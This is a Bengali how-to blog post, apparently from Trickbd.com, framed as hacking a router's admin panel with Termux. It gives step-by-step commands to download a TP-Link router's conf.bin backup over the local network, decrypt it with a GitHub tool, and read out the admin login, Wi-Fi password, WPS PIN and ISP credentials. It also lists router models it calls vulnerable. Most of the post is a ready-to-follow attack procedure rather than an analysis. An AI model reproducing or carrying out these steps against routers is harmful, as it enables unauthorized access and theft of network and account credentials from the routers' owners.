Site icon Trickbd.com

Termux দিয়ে রাউটারের এডমিন প্যানেল হ্যাক খুব সহজে।

Howdy,

কেমন আছেন সবাই আশা করি ভালো আছেন। বরাবরের মতো আজকেও হাজির হলাম নতুন কিছু নিয়ে, তো আজকের আলোচনার টপিক কি সেটা হয়তো টাইটেল দেখে বুঝতে পারছেন চলুন শুরু করা যাক।

tp link এর conf.bin নিয়ে এক ভাইয়ের  পোস্ট আছে চাইলে সেটা দখতে পারেন ।

এই পোস্টে বিস্তারিত বলা আছে বলে আমি তেমন কিছু বলবো না। কারণ আপনারা আমাদের লেখা গুলো না পরে শ স্কিনসর্ট গুলো চলে যায় ।

আজকে termux দিয়ে কিভাবে conf.bin ডাউনলোড করতে হয় সেটা দেখাবো সাথে যে ফাইলটি থাকবে সেটাকেও decrypt করবো তো চলুন শুরু করা যায় ।

 

বরাবরের মতো termux কে আপডেট করে নিবো।

pkg update -y

এখন গিট প্যাকেজ ইনস্টল দিবো।

pkg install git -y

 

Then wget প্যাকেজটি ইনস্টল দিবো। যেহেতু আমাদের ফাইলটি wget দিয়ে ডাউনলোড করবো ।

 

pkg install wget -y

এখন পাইথন প্যাকেজটি ইনস্টল দিবো । আমাদের decrypt করার টুলসটি পাইথন দিয়ে করা।

pkg install python -y

Conf.bin ফাইল decrypt করার জন্য দুইটি module লাগবে ।

pip install pycryptodome

এখন আমরা যে রাউটারের conf.bin ডাউনলোড করবো সেই রাউটারে কানেক্টেড হবো। এবং আমার দেওয়া কমান্ড কপি করে পেস্ট করে দিবেন ।

কমান্ট দেওয়া যাচ্ছে না তাই txt ফাইলে দিলাম

Download

মূল কথা হচ্ছে যারা লগইন আইপি পরিবর্তন করে রাখেন তাহলে পরিবর্তন করে যে আইপি দিছেন ঠিক সেইম আইপি দিতে হবে ।

মূল এখানে আপনার রাউটারের আইপটা দিবে। http://192.168.0.1/CGI/conf.bin সব ঠিক থাকবে শুধু আইপটা পরিবর্তন করবেন ,যদি আইপি পরিবর্তন থাকে তাহলে ।

কমান্ড রান করার সাথে সাথে এই রকম ইন্টার ফেইজ পাবেন দেখেন মার্ক করা আছে saving to : conf.bin ফাইল ডাউনলোড হয়েছে। যাদেরটা হবে না তাদের টা একটু অন্য রকম আসবে ।

এখন ls দিবো তাহলে দেখতে পারো conf.bin পেয়েছি কিনা।

এখন আমরা termux কে স্টো‌রেজ পারমিশন দিয়ে নিবো।

এখন conf.bin ফাইলটিকে ফোনে নিয়ে যাবো তার জন্য লিখবো

cp conf.bin /sdcard/

 

দেখতে পাচ্ছেন আমার ফোনে চলে আচ্ছে ।এখন আমাদের কাজ ফাইলটাকে decrypt করা।

এখন গিটহাব থেকে একটি টুলস ডাউনলোড দিবো ।

git clone https://github.com/sta-c0000/tpconf_bin_xml

 

 

এখন ls দিবো এবং ডাউনলোড করা ফোল্ডারের ভিতরে প্রবেশ করবো।

cd tpconf_bin_xml

 

 

এখন আমরা টুলসটি করবো এবং ফাইলটি decrypt করবো ।

python tpconf_bin_xml.py /sdcard/conf.bin 1.xml

 

Python পরে টুলসটির নাম থাকবে তারপর আমাদের ফাইলটি কোথায় আছে সেই location টা দিবো এবং আমরা কোন ফরমেটে decrypt করবো সেই ফরমেটের নাম দিবো ।

এখানে পাইথন টুলস

/sdcard/conf.bin এইটা আমাদের conf.bin ফাইলের লোকেশন

1.XML হচ্ছে যে ফরমেটে decrypt করবো ।

 

উপরে টুলসটি রান করার পর যাদের এই রকম error আসবে তাদের জন্য 2 নাম্বার module টা ইনস্টল করতে হবে।

২ নাম্বার module ইনস্টল দিবো।

pip install pycryptodomex

 

আবার ও আগের কমান্ড টি রান করবো তাহলে আর error আসবে না।

দেখতে পাচ্ছেন decrypt হয়ে গেছে । এখন ls দিবো তাহলে 1.XML নামে একটা ফাইল দেখতে পারবো ।

 

এখন আমরা 1.XML extract করবো তার জন্য লিখবো

cat 1.xml

Extract হলে এই রকম দেখতে পারো ।এখানে রাউটারের সব কিছু পেয়ে যাবে। প্রথম ছবি টা দেখেন এখানে কোন user name or pass নাই কারণ আমার রাউটেরর login panel যে default user or pass আছে সেটাই কোন পরিবর্তন করা হয়নি তাই এখানে কিছু আসে নাই।

যাদেরটা পরিবর্তন করা হবে তাদেরটা এখানে দেখতে পারবেন ।

দুই নাম্বার ছবিতে আমার রাউটারে wifi পাসওয়ার্ড এবং wps pin

 

মার্ক করা user or pass এইটা হচ্ছে আইএসপি user pass যার সাহায্যে আমরা নেট কানেকশন পাই।

তো দেখতেই পেলেন খুব সহজে একটি রাউটারের সব কিছু দেখতে পেলাম এই পোস্টের ভিডিওটি YouTube আপডেট করা হচ্ছে না চাইলে আপনারা আমার পেইজ থেকে দেখতে পারেন।

 

এই মেডট সব রাউটারে কাজ করবে না নিচের দেওয়া গুলোতে কাজ করবে ।

  • TL-WR840N
  • TL-WR841N

Some Other Routers of TP-LINK are also vulnerable of a similar kind of attack

  • WL-WA850RE

তো আজ এই পর্যন্তই ভালো থাকবেন সুস্থ থাকবেন আল্লাহ হাফেজ ।

Facebook Page

YouTube